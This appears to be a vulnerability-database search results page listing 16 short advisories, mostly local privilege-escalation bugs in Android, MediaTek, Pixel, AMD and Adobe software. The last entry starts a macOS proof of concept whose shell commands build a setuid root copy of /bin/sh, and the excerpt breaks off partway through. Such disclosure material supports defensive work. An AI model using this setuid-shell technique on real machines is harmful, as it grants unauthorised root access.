16 matches found
CVE-2021-0365
In display driver, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-11; Patch ID: ALPS05454782...
EUVD-2019-11696
Malware in sbrugna...
CVE-2024-20121
In KeyInstall, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08956986; Issue ID: MSV-1574...
CVE-2024-40658
In getConfig of SoftVideoDecoderOMXComponent.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation...
CVE-2019-7246
An issue was discovered in atillk64.sys in AMD ATI Diagnostics Hardware Abstraction Sys/Overclocking Utility 5.11.9.0. The vulnerable driver exposes a wrmsr instruction and does not properly filter the Model Specific Register MSR. Allowing arbitrary MSR writes can lead to Ring-0 code execution an...
PT-2025-19334 · Mediatek +1 · Mt2718 +1
Name of the Vulnerable Software and Affected Versions: The product name cannot be determined. Description: In thermal, there is a possible out of bounds write due to a race condition. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege...
CVE-2018-9387
In multiple functions of mnh-sm.c, there is a possible way to trigger a heap overflow due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation...
CVE-2024-47027
CVE-2024-47027 affects Google Pixel/Android components, with the vulnerability in sm_mem_compat_get_vmm_obj in lib/sm/shared_mem.c. The issue allows arbitrary physical memory access due to improper input validation, enabling local privilege escalation without additional privileges or user interac...
CVE-2024-32927
In sendDeviceState16 of RadioExt.cpp, there is a possible use after free due to improper locking. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation...
CVE-2024-30299
Adobe FrameMaker Publishing Server (versions 2020.3, 2022.2 and earlier) is affected by an Improper Authentication vulnerability that can lead to privilege escalation. The issue allows an unauthenticated attacker to gain unauthorized access or elevated privileges within the application, and explo...
Out-of-bounds
In libdexfile, there is a possible out of bounds read due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation...
Code injection
In Policy of Policy.java, there is a possible boot loop due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation...
PUB-A-272755865
In parseSecurityParamsFromXml of XmlUtil.java, there is a possible bypass of user specified wifi encryption protocol due to improperly used crypto. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation...
CVE-2022-42520
In ServiceInterface::HandleRequest of serviceinterface.cpp, there is a possible use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID:...
PUB-A-205573273
In ionbufferkmapget of ion.c, there is a possible use-after-free due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation...
Apple Mac OSX Adobe Version Cue - Local Privilege Escalation
Proof of concept: haven: fintler$ cd haven: fintler$ id uid=502fintler gid=500fintler groups=500fintler haven: fintler$ echo "cp /bin/sh /Users/$USER;chmod 4755 /Users/$USER/sh;chown root /Users/$USER/sh" productname.sh haven: fintler$ chmod 0755 ./productname.sh haven: fintler$ ln -s...